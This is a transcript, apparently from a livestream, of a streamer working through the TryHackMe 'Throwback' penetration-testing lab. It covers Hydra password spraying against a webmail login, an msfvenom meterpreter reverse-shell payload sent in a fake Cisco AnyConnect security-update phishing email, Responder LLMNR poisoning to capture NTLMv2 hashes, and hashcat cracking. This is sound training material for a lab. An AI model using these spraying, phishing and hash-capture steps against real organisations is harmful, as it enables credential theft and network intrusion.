yep. So now let me get my bearings back one more time. We have all these email addresses and all of these potential users. Is there anything else in here that I should have looked at previously that I didn't? I am using the registered version of sublime. That is all because one very, very generous viewer had like got so tired of me having the stupid pop-up every now and again that he's just like, here, I bought you the pro version of sublime text. He just sent it to me. I was like, thanks, you're the best. Sublime, I really like sublime text. I know like I'm not as cool and I should totally be using like Vim or Emacs. Whatever, I'm not cool. Okay, now we will do those weak password things. And let's try the cheesy list that they offered us to start with, I guess. Let me open up passwords. Good, oh, awesome. Kadawi, I started to use sublime text because of you and I love it. I'm very happy to hear that. Thank you, throwback. Wait, who's that? No, password 2020. Yeah, management 2020, management 2018, summer 2020. I'm sure it will be a winter. Let's do a fall. Let's do an autumn just to appease the world. Seasons, spring 2020, management management. And we could do all those with a different year if we really, really wanted to. I guess we should just cause that's kind of good. We'll do the same for 2018, spring, summer. Yeah, 18. Can I do a video of all these keyboard shortcuts with Subble, yes. I actually have a video in mind cause people always ask me like, hey, can you do show, can you, can you, can you? That's what they say. Can you showcase something of how you move so quickly around in the command line, in the terminal? And I'm like, yeah, I can do that. But I just need to like sit down and do it. So I promise I will sometime soon, I'm sorry. Let's try to do the Hydra then. It says I need to use burp to do this. I don't really want to bother with burp. So let me see if I can find those same post requests just with a regular thing. How do they pass that in? That's all they did. You didn't, oh, they just use it to get the requests. Like variables, man. I think we can do that without. Let's go get our mail server and hop over there. So if I just take a look here, I'll send in a fake please sub or whatever, try to log in and wait till it loads apparently so I can use the quick moment to have a drink. Okay, it does say incorrect when that's wrong. But going back, taking a look at the page here, log in username, that name is gonna be login username and secret key, excuse me, is that literally it? Is that what they showcase? Yeah, it is, whatever. Okay, so I have Hydra installed, which is a perk of having things installed. If I go back to this directory, I can Hydra attack L with my username and my potential passwords on the machine IP, which I know is 10, 224, 232. So I can slap that guy there. And they are using that HTTP post form method of Hydra. I always forget this syntax, so I forgive me for having to like have to have that beside me because if it's not FTP or SSH, or I can't just say like schema and then it just runs, then I have to look at it because I'm stupid. Bitcode, John Hammons on Twitch. Yeah, sorry, I thought I would try it because everyone's like, you should do Twitch. And I was like, okay, so here I am. I know it took me stinking forever. Welcome, thanks for coming to hang out. I'm trying to do this a little bit, trying to explore and have some fun. So login username can equal and then the character sign username. I believe that's what it's asking for. Oh, no, no, yeah, sorry, a name, but I highlighted ID, so I scared myself. Password needs to be secret key and secret key equals password. Incredible, truly incredible. What else do they have in there? Okay, and then you have to specify like when it's wrong. Oh, and it should be pass, not password and user. Yeah, okay. Security's here too, all of my friends, oh my goodness. Thanks everybody, I appreciate you coming to hang out. I hope you don't mind me fumbling around, failing in the stuff that I do, and F needs to be when it's wrong, it'll say incorrect, and then we'll slap attack V on there. Let's see if it'll try it. Ooh, the guest one worked, so that tells me that it was right, but I didn't find anything else. So, oh, we got some optional emoticons, I love it. I need to learn how to use Twitch so that I can properly put some in there. I don't need to supply those things that I know already work. I'm actually gonna take those out to see if it will do this. Please go, please do, please again. Nice, Humphrey works, was there anything else? Will you tell me anything else? I mean, I guess I didn't really brute force anything with that one though, I just kind of found that earlier. Ooh, Wester, those emoticons there. Yeah, you guys want to have any emojis? I don't know why. I would be grateful, I'd appreciate it. Okay, what are you doing, computer? Let's try to log in with Humphrey W and his security center and see if there's anything new in there. I do want to remove those though because I know that those worked. Go back to passwords and remove him. Can I please get something that I didn't have before? I know the HydraRestore file needs to do this thing. Welcome, this isn't useful. I don't want this. Is there anything else in here? He doesn't have any emails. He's just like a new person. He's like, fill out who you are. What's going on, dude? What's going on? Yeah, it needs me to like fill this out. I don't want to. Let's go back to reading. If you successfully password sprayed, you'll now have a user account or two that you have fully compromised, allowing you to view company emails potentially gain further access into the network. So I don't have anything yet. Maybe I, how come they're using lowercase p? They're just a singular password. Or are they just using one at a time? Like, we put together some of these. We put together some of these weak passwords. Do I need to like throw rock you at it? Stop, I don't need to know. I'm thinking. Anyway, let's fill out some of those things. What username found with HydraRestores with an M? I guess MurphyF we should have had a hit for. Yeah, that's fair. MurphyF should have had a response. Is he in my users? Usernames, MurphyF. Are we just wasting time on all these other ones that I put in earlier that literally don't need? Should I have had some hit? Is it an AD thing with the email loss? Like the domain? I don't think so. Let me go back to my command line anyway. Sorry, I should put in the usernames here. Login underscore username is probably what I needed to submit there. I should do a angstrom CTF. Dude, are you on the angstrom CTF team? You guys put on an awesome game, like every single time. There are a lot of like new challenges that I'm like, ooh, I've never actually done no SQLI injection or if like MongoDB thing. So thank you, thank you for providing really good challenges that are also like realistically attainable and don't make me hate myself. So kudos to you guys. Angstrom CTF and ACTF is always like really good. Kudos. The reason they supplied a password. Oh, gotcha. For like the lowercase p, I would have expected this to like find something, right? Maybe the usernames that I kind of tossed in here just are wrong. Or like the passwords that I'm trying are not what it should be. Let's run Hydra again with tac i to not restore and then just throw stuff in. So like don't you put that evil on me? Did I break it? I did not break it. I could manually try to figure out passwords for my boy Murphy F over here. My man Murphy, did you try company 2020 in my pass list? Like not literally company. I put in throwback, but I guess it is like throwback hacks. Should I have that? Throwback, throwback hacks, throwback hacks security. 2020 in a world of devastation. Do it again. I know you're like probably, I know Hydra's probably still in the middle of like actively doing something. So I'm just making it worse for myself. It's fine. We can take a break. We can take a chill time. Unless like I'm literally wrong with some of these passwords here. Could someone give me a sanity check? Looking at this password list here. Murphy F, apparently we need to, we should get a hit. Did the stream die? I just saw Twitch should be like connecting. Welcome back to the chat room. Like did the stream die? I got scared for a second. Did it die? You guys are sketching me out. RIP stream. Appreciate it. You wouldn't lie to me. Thank you. I'm staring at this. I'm staring at this form of the screenshot here. This guy, this used tack P and got four different credentials that are all the same password. Am I using the Hydra syntax wrong? Tack P for pass and tack capital P for file. Strelix is the creator. Help, please help. I send help. That's right, right? Maybe there's just, oh, oh, we got one. We got them boys. I don't know why Hydra took forever on that one. Probably just trying to wrestle with squirrels in the squirrel mail. It's the same for every stupid. It's the same, it's the same. Is that literally the top one there? God dang it. You guys know the song Untitled by Simple Plan? It's the really, it's kind of the old one that you guys sing or like we would sing, you know? It was like really rebellious. Oh, management got one. Ooh, we got hits now. Anyway, Simple Plan, right? Untitled, that cool emo song we would all sing when we were like in middle school, like grunge angst. And you know the chorus and the bridge where they're like, how could this happen to me? See, I do that constantly in real life. And in Caitlyn and my Caleb and my other friends, Caleb likes it. Caitlyn hates it as I'll do it like as a meme all the time. Whenever something is just wrong in my life, it's like how could this happen to me? Sweet, we got credentials. Hydra finally stinking did something. Murphy got a password and those are all four. Yeah, of course, Caleb likes it. He appreciates my memes, he appreciates my insanity. I don't know, they just keep coming. Everyone has bad passwords. Truly incredible. This is the mail server. Using Hydra, we found these credentials. Slap. And let's bridge this guy in there. Bruh, we were the nerds. Davies? Yeah, see, it's a good thing that we looked at the management 2018. It's a good thing we looked at the contacts page and the squirrel mail because my username and I was completely backwards in the way that they had organized and used their naming convention for user accounts. So thank you for putting me on the correct path. Everyone else is summer 2020. Dude, what a time to be alive, am I right? Over at the beach drinking some Coca-Cola's out in the fresh air, just laying out in the sun. All the people at the beach, summer 2020. I'm not crying, you're crying. We got it. We got five accounts, right? Right, stop, stop, stop flailing around in the bit code, that's a good joke. That's a good joke, buddy. Don't let anyone ever tell you it's not. My password is incorrect. So whenever I get my password wrong, it tells me my password is incorrect, that's a good joke. Keep on keeping on. Darkstar said no to COVID-19, what? Oh, you were originally gonna use a password of COVID-19 2020? I'm telling you, throwback is a comedy show. We're here for a good time, guys. Okay, we should log in with all of this newfound knowledge that we have. Get out of here, Squirrel Mail, Humphrey W. Let's become peanut butter in the beautiful summer 2020. Nope, that account is also useless, sighing out. Thanks, LastPass. That's a good one too, Wester, I like that. Overwrite 2020 with DevNol, shred 2020. Jeff Davies sending some test emails to his account, attaching a shell.exe. Jeff, you're a inside threat, buddy. I don't think you should be allowed back in the office. Not that anyone is. This is a zero kilobyte text file. What? It has content. All right, we're having too much fun, guys. We gotta get serious. We gotta buckle down. Now we're gonna be Gongo, Gongo H, Murphy F. I'm glad you guys like the let's become peanut butter. Password, recent notification. Should I have done anything with that shell.exe, actually, before I derail? I think that's like a reverse shell, I would thought. So I would have thought. Due to the recent firing of our time, we keep developer who had access to our database. Excuse me. We have decided to issue a password reset. You can do so by replacing user account name in the new password in the following. Ooh, that's good to know. Oh, Frank's first name is Murphy F. His first name is Frank. Now we've learned. We have too many readme as now. Now I'm just going crazy. This is bad. Did we actually have Frank Murphy previously? Frank Murph. Frank Murky. And that is worthwhile to know. So we saw actually over in mail, logging in with Davies J. We found a shell.exe file. Logging in with Murphy or Murphy with many Fs. We found this guy. Yeah. Do I already have Frank Murphy? Frank. Sorry to meet you. Sorry. I guess I literally have Frank Murphy in there twice. I'm a fool. Okay. So we have the thought that we can potentially rename or reset a password for some users that will be handy. I'm curious about this timekeep.throwback.local though. Cause with that domain, we don't know that yet. Can you edit the link and reset any user's password? Yes. But I don't have a location set for timekeep.throwback. We need a Fire Elmo also. Yeah. My favorite GIF, the Fire Elmo. I'd love that. I'd love that. Okay. We have one more user to explore before I frantically move around my keyboard again. I'm so sorry. I don't know how you guys watch these videos. Mail. We got to get Jeffers D log out. Thanks for hanging out, everybody. I can't say it enough. He's also useless. Okay, great. Thank you for nothing, Jeff. Jeffers. Now let's go back to the readings. Let's go back to the holy book of throwback. We've already answered all the tasks in there. So let's see what task 12 has. Whoa, whoa, whoa, whoa, whoa, whoa. A lot of scrolling. Now that we can investigate the mail server, we have a guest account on the mail server. However, the only information we can gather from it is a contact list of employees' emails with a list of emails we can send to the phishing campaign to see if employees execute a malicious payload. Yup. Phishing, sending a deceptive sneaky lie, attaching an AXE to an email, having the user execute that file, granting us a reverse shell. This can be done with MSF Venom to create the payload. Before we send out phishing emails, we need to first identify targets since we have the specific goal in mind. We want to target employees that throwback hacks. We can find employees from the contact list of the guest account that we have compromised earlier on new burning web servers. We can also send emails from the guest account as a trusted email within the domain. Payloads 101, we can do this with MSF Venom, Metasploit, staged, require you to handle the payload and send the staged list. So I guess I actually don't often hear staged lists. I just hear, stageer, stage require a handler like meturpter to like user, use X-Way multi-handler to catch it properly. Staged list payloads don't require any specific handler. I can be just caught with like neck hats, soak hat, or others. Okay, I don't think I need to learn a ton of review on MSF Venom. We will be using meturpter, reverse TCP. Cool. So far, staged payload sounds like the best payload. Yeah, sorry, I'm reading and I realized I turned off my entertainer hat. I took off my entertainer hat. I appreciate all the follows, everybody. Thanks for doing this. We're gonna make this a lot more fun, right? Hopefully we can be able to do this a lot more. Generating payloads. All right, we're doing this with MSF Venom and we'll connect to our ton zero address or what's actually inside the VPN connection, specifying a port and then a output as notashale.exe. Super cool. Okay. And then we would need to actually catch it. We could do that. Yep, they just showcase X-Way multi-handler. Yeah, you wish Streamlabs, OBS, absolutely. I 1000% agree. I wish OBS would work on Linux. And that's kind of why I was bumping around not wanting to get on Twitch because it was like, oh, I gotta have all the fancy sounds and bells and whistles go off whenever someone either subscribes or does anything, but I don't know. I hope that we'll keep this cool YouTube format or not even YouTube format, but just homegrown and original my webcam on the bottom and then the screen. I like to keep it simple. So, okay. Once we build this thing and we can go ahead and build this, let's go ahead and let's make a meterpreter directory. And let's use MSF Venom, tackp windows, meterpreter, reverse TCP. I'll set my L host equal to ton zero and then I will set my L port equal to, what do you guys think, quad eight, quad nine? Yeah, thanks. I appreciate that, Kadawi. I'm going for quad eight until anyone tells me otherwise. Four one, four one. You're quick on the trigger. Two, seven, three, seven, four. What? I don't think we need anything else in here, do we? A, A. L port, A, S, D, F. That's not right, John. Four one, four one. They didn't throw anything else in here, did they? It's literally all the payload that you need. Yeah, and then, okay, just make it an executable and redirect it to big calling there's not a shell so I'll do the same thing. It took two minutes to set up streamlabs, but yes, if I want to set up, if I want to see up my theme from nerd or dialects, it'll be, oh yeah, yeah. Gotcha. Now we have not a shell and I didn't even put that in the meterpreter directory that I made for the sole purpose of actually doing that. Meterpreter, okay. Then let's actually make a shell down there and let's make a little MSF console shell. I'll make it dark and scary. So it looks like we're really gonna do some hacks and we'll do the exact same thing. Oh no, they forgot their L port, rest of their syntax. Use multi-handler, bam, set L host to ton zero. And don't forget, they actually set the payload, Windows meterpreter, why are you guys yelling at me about the readme? What did we need in there? Yeah, so didn't your syntax serics use the, yeah, you literally used the greater than symbol to redirect it. I thought that's just kind of what it needs to be in some cases. I can C-tack you, that's fine. Interpreter reverse TCP, set L port 444141, none of those things. And let that do its thing. Okay, then we need to craft a stealthy phishing email. Hey everyone, okay. Some phishing emails to all employees at Throwback Hacks. Send it to everyone. Is that so? Okay, yeah, I didn't type exploit. I never actually type exploit. I always type run in my meterpreter. Whatever, let's get back to our mail and I can send it as a guest, right? Yeah, run. Oh, there's a flag button, I'm kidding. That's true, it's really like I appreciate, I appreciate you saying that. That screenshot's obviously not yours because it's parrot and I'm kidding. Don't hate me. Let's craft our phishing email. Let's save this as a meterpreter like phishingemail.text. Phishingemail.text. Urgent, update your Cisco any connect client. Good afternoon. It has been brought to the IT, oh, okay. Let's write a real phishing email. It's I've been brought to the IT department's attention that there is a new critical vulnerability and we'll make it like really official CVE 20234517 or whatever I just did present in the Cisco any connect client that our company uses to connect to our corporate network. I feel like a hacker and I'm not even doing anything. For your safety and the benefit security and the security of our business, please download the security update attached. This is the realest phishing email. I hope I type that as loudly as possible. For your safety and security of our business. It's physical safety. Press X to doubt. This patch and remediation must be ran immediately. Love always. Johnny. Very respectfully, throwback, hacks, security, IT. Also known as fit and you spell out the acronym. That was good. That was fun. Thanks everybody. Thanks for sticking with me on that one. Not to be confused with tea. Oh, good. Oh, no, that is not the two line. That's the subject. And who are we sending this to? Literally everyone, obviously Humphrey W. And I need to attach a file. Can I like do a comma separated thing here? Is that gonna work? How does squirrel mill supply other people? New line replace with comma. I'm gonna send it to no reply at no reply. Yeah, maybe a semicolon. I can't tell. Let's find out priority, critical, paste in our extremely pressing update. Now you guys know how to write a real legitimate fishing email. CTF, THM, throwback, not a shell. Is that it? Oh, I have to hit the attach button. That would have, that would have pissed me off if I didn't click attach. Needs more typos? No. It said use correct grammar and punctuation. I like this one's very casual and very sweet. Hey everyone, we're releasing an update. Send, go, let's watch our shell. I sure hope that was right. I sure hope everything was properly created there. Who did I send this to? Other than literally everyone. It probably, it probably didn't send to anyone because of those stupid commas. Let's use the, let's, yeah, let's get the semicolons in there and see if that will behave. Bojack Horseman. Dude, he better be the one that clicks on the email. I absolutely want to fish Bojack Horseman. Don't tell him. Don't tell him I said that. A lot of shell, attach. Are we gonna go any fish? Not yet. Send it. Let's leave that bad boy open. Stop saying bad boy, John. No one yet. I'm gonna move this up. Actually, I hope you don't mind. I'm gonna move this to the other screen just so I can like see it into my peripheral view. Oh, why did I do that? Why did I do it? Immediately we get a shell. Why did you even do it, John? Okay. Who am I? Great, thanks, meterpreter. Get UID. I am Blair J. Oh, hello, Blairj. Thank you for giving me your computer. Let's, what user was compromised via fishing? Blairj. Excuse me? Is it, is that who my, is that who, is that not, not who am I supposed to, Blairj? Did we hack too good? It was the fishing email, guys. I told you the fishing email was gonna get, oh, there's an E. You, thank you. Thank you, chat, thank you, chat. I was trying to do the Blair Witch project over here, but clearly, thank you. This dude can't type. Yeah, hey, man. You know, you know this. We all know. All right, yeah, when you don't copy paste, exactly. Now let's run persistence. Oh, actually, now let's do some good stuff. Your team decides the best next move is to fire up responder and try to poison LLMNR and get an NTLM response back. Okay, cool. Now we're getting into some stuff that I'm not extremely smart on. So to fully understand how the LLMNR poisoning attack works, we first need to understand how LLMNR and NBTNS work and why they're part of Windows Active Directory. The link local multicast name resolution, LLMNR, and NetBio's name service, NBTNS, are Windows domain services that act as an alternative method for host identification. You can think of LLMR like DNS. It allows hosts in the same network to use name resolution for other hosts. Is that so? That's kind of like, that's a really good thing. That really helps me kind of understand it. I feel bad because when I'm doing a stream or like in the mentality and mode of recording a video, I'll just read something and it'll go completely over my head. Like I won't process or parse literally anything that I just said. So link local multicast name resolution are Windows domain services that are used for host identification, like DNS at a low level, hosts in the same network to use name resolution for other hosts. Whoa, bitcode, thanks. I appreciate everything. Sorry, I'm just trying to catch everything that's happening in this chat. Yeah, we did Pizza Friday. We did Pizza Friday yesterday. I actually ate all of the leftover pizza this morning for breakfast. Okay. You can spoof the resource for a name resolution on a victim network using Responder, a tool used to respond to LLMR and NBT requests acting as though you know the identity of a host, poisoning the service so that the victims will communicate with our machine rather than the original. If the host belongs to a resource that requires identification, the user and their NTLM hash will be sent to the attacker. Nice. These hashes can then be collected from Responder and taken offline to be cracked and then used to access the poison users' machines and can be taken to PSX to get a shell. Okay. So we need to get Responder. I am not on Cali. So let's get Responder. Is Responder part of impact it? It's not. It's not, is it? Responder GitHub. Yeah, it's spider labs. I remember that now. I think I've messed with this tangentially before. So hop over to the old ops directory. Oh, no. No. Is it Python 2? Oh, thank you. Thank you. It's Icon-Dex. This is the proper correct. I got real scared. You could see, you could, you guys knew when I was like, what? Now let's try that again. How do we look? Responder. Responder. Incredible. Great. Okay. Responder must be run as root. Great. What do I do with it? I need an interface. Time zero. Whoa. Is it just like doing this now? It's just doing this thing. What am I supposed to be doing? Computer. Hopefully my face isn't in the way here. Oh, if I just like leave it running, it'll just look for stuff. It'll just. Okay. So, responders default settings are set to poison elements and NBTS. So all we have to do is set the IP to our time zero network. The R switch enables net bios, net bios, W reader suffix queries. What are those? And D switch enables net bios domain suffix queries and W switch makes the W pad rogue proxy server. Should I just kind of hit the I believe button on that? I'm sketched out. R2W and then tag V. Tag V I get, you know, okay verbose. Net bios redirect suffix queries. Yeah, so I fired it up. What is the, what are this? If a Windows client cannot resolve a host name using DNS, it will use the link local multicast name resolution protocol to ask neighboring computers. LLMNR can be used to resolve both IPv4 and IPv6 addresses. If this fails, net bios name service will be used. NBTNS is a similar protocol to LLMNR that serves the same purpose. The main difference between the two is that NBTNS works over IPv4 only. Okay. So for my own learning, is this just like a good thing to use like whenever you're just straight up in a Windows internal environment and network? Like if you're just sitting in there, should you just kind of like be listening with responder? Like there's nothing wrong with that. I don't see anything wrong. Orpheus is telling me yes. A number of attack tools have been developed which will reply to all these queries in the hopes that retrieving sensitive information. Responder developed by TrustWave, SpiderLabs. Why did you take me to Kali Linux? I wanna make sure you guys can actually read this, sorry. To demonstrate the attack, we'll be using Kali Linux. Blah, blah, blah. Enables answers for net bios WRRDR suffix queries. Yes, yes. Quickest way to grab hashes. I haven't gotten anything yet. Am I supposed, should I do something wrong? If it's an active network, you'll get responses like crazy. Okay, I follow. Once you start responder, attempt to access a non-existent share on another machine, typically the one over-materpter. Gotcha. This will probably be explained more to me if I were to actually read. After some time, you may get a response back from responder. It can take anywhere from a couple of minutes to an hour to get back a response. However, on an active network, it shouldn't take more than a few minutes. Ah. Does that mean we're gonna be doing some chill time on the stream again? Are we just gonna hang out? I don't have any problem with that. You know? We can go look at stupid memes together if you want. Yeah, bit code's like, yeah! Yeah, stupid memes, John! Give the people what they want. Meme review with John. I can tell you guys some stories or something. If we're literally just waiting on a responder, I'm like, oh, okay, 10 minutes. I can do that. Then they do some hash-cat stuff. Let me sanity check first. I'm sorry, let me make sure this is all right. Servers are right. I wanna know more about WPAD, though. John, how good are you with binary exploitation? Not good. Honestly, like for real, I think I can do a very, very minimal classic stack-based buffer overflow. Obviously, you've seen me do cheesy, simple over-the-wire stuff. Obviously, if there's a get-shell function or a winner function, I can jump to that if it's a classic vanilla baby buffer overflow. I'm really honestly not that good. People give me way too much credit because I just have a silly YouTube channel. I went through a little bit of Rop Emporium and I guess I can do like basic Rop with Rop Gadget and Ropper or some of the other things. But I can do Ret to Lib C attack, very, very basic. I can do a print def, format string vulnerability with some Pone Tools and the Pi format string thing. Oh, sorry. I'm currently trying to do an NX plus ASLR bypass, but I think my environment is not helping me. Are you on Windows or are you on Linux? Cause I can also make it significantly worse. Linux. Yeah. Whatever you can do, I guess just try and match the architecture and operating system of the target. So many times you run into an issue because whatever stack alignment was different on Ubuntu 18.04 than it is on like whatever previous one. I've seen that bite us in the back a lot. Caleb more so than me cause he does more, he does much more binary exploitation, but there'd be stupid, stupid crap where like stack alignment on 18.04 is weird. Have I tried pentest.ws? It might help to keep track of all this throwback stuff. I have not. Let's look at this on the internet. Yeah, I don't know of that. Sorry, Wester, I don't know. You say I'll check out how to replicate the target. I don't know if that's applicable to you. I don't know if that's worthwhile. I don't know if that's even feasible, but I guess that's something that I keep in mind. This is neat. This would be very cool. This would help. I want to make sure I didn't do this wrong. Ton zero is what I should be doing, right? The fact that I have to bank on this for 10 minutes sketches me out. Cop. Been using cop lately from, oh my gosh, this is peace midi. Yo. It's like waiting for a crotch up. Yeah, that's exactly right. Bro, I am tweaking out because what you just linked night wolf, peace midi, if it's the same guy, I think he's like, I think that's Phillip Smith and he's like one genius that was once army and like would friggin rock the army cyber stakes competition. And it would like smoke all of the other students and cadets and like me and other midshipmen. I think that's the same guy. Let's do some, I don't want to do any OSINT on stream. Nevermind, I'm not going to do that actually. If it takes more than 10 minutes, you should ask for a reset because it did bug out on me when I did the lab. Okay, thanks. I appreciate that heads up. When did we start waiting? When did we go? I don't remember. I'll be honest, this is really nice. I am really enjoying myself just kind of hanging out and streaming with you guys and chill. There is a certain perk to having solitude and not having anyone else in the house. It does sketch me out though because I could be doing this for forever. I could be doing this for hours but man, what do I do on stream when I have to go to the bathroom? I'm kidding, I'm kidding. I'll probably just bounce out if you're like, yo, give me a sec guys. I got a piece out. Take more time while I try to get this voucher. I follow, no worries. So really, are you still with us? I appreciate you coming to jam. I'm really, really grateful. I know it's kind of weird because I'm on Twitch and I don't normally do that but thanks for hanging out. Until you get an OBS or whatever set up, you could use this time to make a be right back sign for my chair. That's an option. I have this piece of paper beside me. Do I have any pens beside me? Oh, kadawi, piece out. That's a good joke. That's good. Or use sublime text. Yeah, just like typo. That'd be more normal. You could also use this time to check out T-Mux. You guys, you guys. Can we like bump around in this box? Maybe that'd be fun. Oh, Blair just has a root.text. Okay, thanks Blairj. I'll take that. This is when I should get back to my read me. Am I, no, I'm on, what is the user flag on that? Submit. Is that right? What? Oh, sorry, root flag, root flag. Yeah. That's nine. Check save games. Maybe there's a game we could still play. What is the root flag on throwback ws 01? That's that guy. Microsoft Edge backups. Let's check out save games just for the meme. Probably empty, desktop.ini, even better. That's worse than finding a directory empty. Like, wow, there's gotta be something really interesting and fascinating and juicy here in this directory. And there's like, oh, great. Default file, classic. Can I, what, what, where am I right now? Users. Can I do a PowerShell load PowerShell? Nope. Can I run shell? I don't wanna run shell. I don't wanna break it. I don't wanna ruin it. Humphrey W. Did I just go into him? His directory? User.text. Sorry. I feel like I just yelled that and I didn't need to. Like volume control in my stream. What is the user flag on, oh, no, throwback. Jackson, user.text. We're like super hyped. How's a, oh, responder got something everybody. Oh, it got a lot, it got two. Peter's Jay. Holy cow. We've broke new ground, guys. We're in new uncharted territory. He goes, yeah, the chat rejoices. Okay. Let's, let's steal all of this for prosperity's sake. What do I do with this? Where do I wanna save this to be good? Throwback. Responder. Can someone actually, sorry. Am I overthinking this? In that, am I overthinking this in that? Like, would I normally be able to see that with responder in this position? Cause like, I don't feel like we're in the network yet. I just have my interface that's on these same machines. Or am I not understanding like the, the kind of network architecture that's set up right now? I'm a, you're effectively in already. So effectively in that, like, I have my interpreter shell, but I don't think I've set up like any auto routes or anything, or effectively as in the, I follow. I follow. Now I get it. Yeah, for you people that need to go to bed, just go to bed, dude. I'm sorry we're up so late. I didn't mean for all this. Peter's J. Is that right? Peter's J. Gotcha. What's the fourth octet of the IP address that the LLMNR request came from? That is the 219. And we know that that is prod, right? Go back to our original read me. Yeah. We're on prod, baby. What is the host name of the device? Throwback, pro. Is that in the output of a, no, no, it's not. Okay. Time to use hash cat and cause a kernel panic while I'm streaming. Incredible. We use some password tracking. We could probably do it with John the Ripper maybe. I don't know. Also a lot of active directory attacking, especially if you want to be covert, does not involve RDPing in. Yeah. That makes complete sense to me. I think RDP would kind of be a little giveaway. I don't know. You should use PS exec. If the kernel panic's IPanic, that's good. Ooh. Collab cat? I never heard of that. What is that? I never heard a collab cat. That's so neat. It's like a Google drive hash cat? Okay. Today I learned. Don't use John. Trust me, Roger. Okay. John the Ripper is out. We will roll the dice and see if we get our hash to see if we get hash cat to keep my computer alive. Let's Google a hash cat methods. Let's go off in the deep end and not immediately look at what the page is sort of telling us. Can I just search for LLM and R in their example stuff? Example hashes. Nope. Not going to tell me whatsoever. I'll zoom way in. NTLMv2? NTLM. NTLMv2. NTLMv2 looks the most like what we're dealing with. That is a long string. The course notes recommend 1,000 but that's just a basic hash, isn't it? Am I not understanding that? Or is that just this thing? Oh yeah, NTLM SSP. That makes sense to me. The one that you teach recommends 5,600. Also, why do I have two different hashes? Is that just salt doing weird things? Using rules. Excuse me. One rule to rule them all is a large rule list contains more than 50,000 rules making it much more effective than creating your own list. Do I need to use those rules? Is it not going to crash? Oh, I follow. The method 1,000 is for the one that we saw earlier, the security center one. So let's get back to where we were working and let's see what we can do. Throwback, I have it in the readme, I think. I have it in hosts, pro, firewall. It was this guy. Hey, thanks for the raid. I don't know what that means. And let's use the little hash cat, tack m1,000 hashes and rocku.txt. Do I have to specify a w here? Just do it. Oh, sorry, opt, optrocku.txt. Hello, Raiders. Welcome, everybody. I have no idea what's happening. You guys are all excited. Oh, heck yeah. Somebody who's on streaming can send their users to their channel. Well, thanks so much, everybody. I appreciate you coming to hang out. I'm about to run a hash cat, so let's see if the entire stream crashes. Hash cat is still starting. Thanks, RWX Rob. I have no idea who that is. I'm so sorry. I'm just being real, guys. Bam, hash cat cracked it. Security center, that's the one. Okay, now let's do the ntlm hash. So we were in prod, right? Let's create a hashes.txt file with what we got from responder. Does this need to be in what specific format? Hash cat will tell me. Yes, we already had that password. I'm sorry, California. That was just for, excuse me, my learnings. Just for my knowledge. And so it's admin at a specific host, I'm assuming, and then that seemingly salt with all of the noise. So it's totally fine, the way that it is. Except the throwback stuff doesn't really need to be in there. Wait, what? This has a couple extras. How does that go? Let's get the rules, first of all. Are you giving me a raw text file? Okay, leave it all in. John, try using collab cat if you don't have a good GPU. Otherwise, we're gonna wait for a long time. Let's find out. You know what? Internet's choking right now, apparently. Or maybe this file is just fucking massive. It sounds like it is. So let's actually put this in opt, because this sounds like it's going to be something that I should use more often. W get one rule to rule them all. Downloads very, very quickly. CTF, try hack me, throwback. CT host prod. And that is the real hash. So I will use hash cat with that tag M5600, right? Sanity check on that real quick. Yep, 5600. Hashes with rules opt one rule to rule them all and rock you dot text. Please do your God. Oh, no, sorry. I need to supply that at the end there. And the tag, tag force. And separator unmatched, no hashes loaded. Is that format wrong? I'm sketched out about that format, not gonna lie. It was telling me about the rules though. I feel like I probably should have read something a little bit more thoroughly, but you guys were scaring me. Cracking into your web hashes. Pending a word uses an op. Oh, yeah. Okay, I understand the rules. Debug mode, debug mode. But that format's not right. We already got that one, a security center. You never had an issue with it before. Do I need to just like switch up this syntax here? Hashes and then op rock you. Oh, that is the thing. I've actually seen that before. I actually ran into that problem the last time I used hash cat and like a video recording. If you supply those other arguments, you do have to have the things that you're actually gonna use after the fact, after your commands. Initializing device kernels in memory. I don't understand what's happening. Dictionary cache hit. I don't think I've seen the kernel panic yet, so that's good. Checking out status with S shows me that we're just doing stuff. Should I go try and use the collab? It's doing its thing. It's cranking along. It looks like if I hit S, if I tap that. Oh, video is cracking. Oh, shit. Okay, all right. I stopped it. Let's go use collab cat. Let's learn that real quick because I have reports 10 days to go. All right, all right, all right. You guys are telling me go to stinking collab cat, so let's do that. How do I do this? Run a hash cat on Google collab. Go to the link below to open a copy of collab and Google collab. Click on runtime, change runtime type and set hardware accelerator to GPU. All right, I can read so far. So runtime, change runtime type. Hardware accelerator to GPU. That looks like it's set. I'll zoom in a little bit on that so you guys can actually see it. Go to your Google drive and create a directory called .hashcat with a hash to the sub directory that you can store hashes. I'm gonna move this up actually out of view. So you guys don't see my Google drive? Cause Opssec, you know what I'm saying? And bear with me a little bit, sorry. Guinness World Record for longest stream. Dude, I am just getting started. Girlfriend is on Night Watch. So I'm here for the long haul. Folder upload, I don't want to upload. I want a create a new folder. Hey, thanks so much for hanging out, code beta. I really appreciate you guys chilling with me. I hope you had some fun and learn a little bit. That's what we're here for. They wanted me to call this .hashcat, .hashcat, create a new folder and a sub directory. Create new folder hashes where you can store hashes. Come back to Google collab, click on runtime and run all. Okay, this little bug is being loaded from that thing. Do it anyway. Okay, enter my authorization code. I'm gonna move this browser up so you guys don't see that in case it's anything wonky. This is new uncharted territory for me. So I mean, yeah, I haven't actually used collab cat before, so I'm also in the weirdness. What, what, what? Why'd you give me an invalid auth code? Sorry, I'd realized you're kind of blind to this. I'm confused. Can I, I'll pull this down. When it asks for a Google drive code, can go to link and revise and authenticate with your Google account to get the token. You can edit the last cells in the notebook to customize the wordless downloads and the type of hash it cracks. The full list of these can be found here. If needed, simply type bash in a new shell to get instance to an app. Okay, let's create a, can I just run that? Yeah, okay. What? Can I not see this? That's weird. CD, content, CD.hashcap. CD.hashcap. Mm, I'm sketched out. Content, CD sample data, LS. Can I not just kind of like put files in here? Am I doing this wrong? Or should I have like done all this? I'll let this try again. I think this needs to like actually execute just fine. Yeah, it should take the hashes from like Google drive. So I made those subdirectory structures. Can I stop this one? I don't want that to run, but I want this one to run. You're currently executing. Oh man. I don't know what you're doing. I guess I need to stop that thing. Yeah, okay. And it needs me to go do this silly authorization thing again. Okay. Please do it. Please copy this code. Copy, paste it. Is there an enter button? Yeah, it looks like it is syncing, but it just fails. So I'll show you this. This drink will, this will ask you to go to a link and get another authorization code. The hashtag folder gets into your Google drive and make a symbolic link between the Google drive and it's apparently wrong. But why? But why? Who am I logged in as right now? I'm regular John. I'm not work, John. Do it again. This is gonna be like my third time trying this. I know I'm using a different auth code each time. So I just copied it from a different page. I will slap that in. And I don't see anything else. So I just hit enter and it tells me that's wrong. So I don't know. I think 